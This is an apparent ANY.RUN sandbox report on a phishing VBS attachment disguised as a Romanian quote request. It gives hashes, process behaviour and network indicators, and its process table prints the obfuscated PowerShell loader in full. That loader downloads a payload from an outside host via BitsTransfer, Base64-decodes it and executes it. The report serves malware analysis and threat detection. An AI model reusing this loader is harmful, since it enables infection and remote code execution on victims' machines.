File name:

CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.gz

Full analysis: https://app.any.run/tasks/04c5b9d2-8e2d-41a7-b4d6-4d659ebcea2f
Verdict: Malicious activity
Analysis date: May 16, 2023, 12:13:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/gzip
File info: gzip compressed data, was "CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbs", last modified: Wed Apr 26 05:22:52 2023, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 28077
MD5:

2D2F1316B506F202330F985A1B60F41A

SHA1:

AF3FAB5850FA112129A08EF06A0394AEAD5CEF74

SHA256:

0469E06E3642E8CBE085F89023941C257DF7B179E93CE3C3FF8FF356FF2E4DF4

SSDEEP:

384:PSsCg0CRIAKU5HEQfVwRMtY0jeyqHvHMdzWkDxr43PcZE0:PSsCNCRL7fCRaTqHEN9d80

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual connection from system programs

      • wscript.exe (PID: 188)

  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 188)

    • The process executes VB scripts

      • WinRAR.exe (PID: 3948)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 188)

    • Adds/modifies Windows certificates

      • WinRAR.exe (PID: 3948)

  • INFO

    • Create files in a temporary directory

      • wscript.exe (PID: 188)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.z/gz/gzip | GZipped data (100)

EXIF

ZIP

ArchivedFileName: CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbs
OperatingSystem: FAT filesystem (MS-DOS, OS/2, NT/Win32)
ExtraFlags: (none)
ModifyDate: 2023:04:26 05:22:52+00:00
Flags: FileName
Compression: Deflated
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
188"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa3948.19583\CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbs" C:\Windows\System32\wscript.exe
WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3588"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Uforgng1259 ([String]$presta){For($Tunerch=1; $Tunerch -lt $presta.Length-1; $Tunerch+=(1+1)){$Parall=$Parall+$presta.Substring($Tunerch, 1)};$Parall;}$Subrepta=Uforgng1259 'Vh tGtHp sC:F/ /Ab a tKtOppe tsf o rBtF.SrDo /CI c h tdh . aCfIm ';$Parall01=Uforgng1259 'GiSe xS ';$Ejertidend = Uforgng1259 ' \RsEy sCwWo w 6 4K\SW i nAdBoCw sBPTo w e raSFhFe lPlA\ v 1 . 0 \DpAoAwMeRr sIh e l lS.HePxAeL ';.($Parall01) (Uforgng1259 's$ SscFu r vC2 =S$ ednMvT:UwSi n d iJr ') ;.($Parall01) (Uforgng1259 ' $JEAj eFr tBiDdEe nMdC=K$SSLc uSrSv 2E+R$lEwjMe r tUiRd eMnkde ') ;.($Parall01) (Uforgng1259 'p$ S t epm p eIlTpFuKdB =M S( ( gNw mSiG wKiNnC3S2D_ApSr oUc e sMsA c- FF PArAoBcOe sTsHIBdP= $i{ PEI D }S) .FCSo mAmFa n duLPiPn e )F S-Ms pEl i tB P[GcEhAa r ]F3 4L ');.($Parall01) (Uforgng1259 ' $DMDuFnEd ecr i n gSeB2K2 P=D I$US t eUmMpBeEl pGuCdF[B$ SCtSeFmUp eMlDpSuMd . c ouuOnBtT-v2U] ');.($Parall01) (Uforgng1259 't$ T i l l b s sR2N0f4 = ( TPeLsNtP-CP aBtChR f$ EAjTeKrEtTi dueTnAd ) Q-OA nRdA M(A[UI nftoPOtirG]N:B: s iSzAeM - e qT F8m)U ') ;if ($Tillbss204) {.$Ejertidend $Munderinge22;} else {;$Parall00=Uforgng1259 'CS tfaor tc- BDiUt s TOrRaCnPs fSeVrS - SCoMuSrVcPe O$ISBuHbEr eApPtFaT B-SDGe sCt iMn aEt iRo n $SS cBu rCvP2R ';.($Parall01) (Uforgng1259 ' $ S c u rDv 2S= $VeKnIvc:Pa pCpTdFaJt a ') ;.($Parall01) (Uforgng1259 'DI mDpMoVr t -TMToHdLuRl e BTigtrs TprSa nCs f e rS ') ;$Scurv2=$Scurv2+'\Halfplan.Sul';while (-not $Agersv) {.($Parall01) (Uforgng1259 'L$NA g e r s vS= (PTBe s tU-HP a tSh $NS c uVrBv 2 ) ') ;.($Parall01) $Parall00;.($Parall01) (Uforgng1259 'AS t aRrBt - SIlSeAePpT D5 ');}.($Parall01) (Uforgng1259 'M$ U fBo rKg n gG1 2U5 = G e t -fC o n tSeBnWtG f$TSEc uSrSv 2r ');.($Parall01) (Uforgng1259 ' $TV o dBk aR C=Q [DS y sPt eIm .TCEoFn v eAr tB]a:U:FF rMo m B a s eI6 4US tCrSiEn gB( $ Udf o rPg nCgT1 2 5D) ');.($Parall01) (Uforgng1259 ' $nP a r aSlPl 2S U= [GSByPs tsePm .NTRe xVtH. EEn c obd innBgS] :S: ASS C I I . G eMtGSFtUrmiUn gS( $ V oFdAkAaH) ');.($Parall01) (Uforgng1259 ' $ FarCu gFt =U$FPPaAr a l l 2 . sKuHbasPt r i nFgA(F1 8 7H3P7A9 ,U1g8 7F3u1A)S ');.($Parall01) $Frugt;}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3948"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.gz.z"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
Total events
53 754
Read events
53 684
Write events
67
Delete events
3

Modification events

(PID) Process:(3948) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(3948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
0
Suspicious files
6
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
188wscript.exeC:\Users\admin\AppData\Local\Temp\TarE4A6.tmpbinary
MD5:4FF65AD929CD9A367680E0E5B1C08166
SHA256:C8733C93CC5AAF5CA206D06AF22EE8DBDEC764FB5085019A6A9181FEB9DFDEE6
3948WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3948.19583\CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbstext
MD5:B5DE2D8F6BDF4A70832D83F3E3805677
SHA256:7B50F628446EBA2B2D1B8CC3399877FB75E1DD86439ED2EDA18847BF160B47DC
188wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:1F6846D294C799DB9A04153C9CB8F8E8
SHA256:DCCD9F4E0AF5A0C9C8C080B35F998E138CE530DB9725EF45DCD75BE28B29978A
3588powershell.exeC:\Users\admin\AppData\Local\Temp\51rfetc5.erm.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3588powershell.exeC:\Users\admin\AppData\Local\Temp\os34euhf.dtu.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
188wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:3AC860860707BAAF32469FA7CC7C0192
SHA256:D015145D551ECD14916270EFAD773BBC9FD57FAD2228D2C24559F696C961D904
188wscript.exeC:\Users\admin\AppData\Local\Temp\CabE4A5.tmpcompressed
MD5:3AC860860707BAAF32469FA7CC7C0192
SHA256:D015145D551ECD14916270EFAD773BBC9FD57FAD2228D2C24559F696C961D904
3948WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3948.43452\CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbstext
MD5:B5DE2D8F6BDF4A70832D83F3E3805677
SHA256:7B50F628446EBA2B2D1B8CC3399877FB75E1DD86439ED2EDA18847BF160B47DC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
60
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
188
wscript.exe
GET
200
8.238.29.126:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5aeb27b25f2561d9
US
compressed
62.3 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1076
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
188
wscript.exe
8.238.29.126:80
ctldl.windowsupdate.com
LEVEL3
US
suspicious
3408
svchost.exe
239.255.255.250:1900
whitelisted
852
svchost.exe
93.119.122.128:443
battpetfort.ro
CLAUS WEB srl
RO
suspicious
93.119.122.128:443
battpetfort.ro
CLAUS WEB srl
RO
suspicious

DNS requests

Domain
IP
Reputation
ctldl.windowsupdate.com
  • 8.238.29.126
  • 8.238.36.254
  • 8.238.33.254
  • 8.238.189.126
  • 8.238.32.126
whitelisted
battpetfort.ro
  • 93.119.122.128
suspicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.gz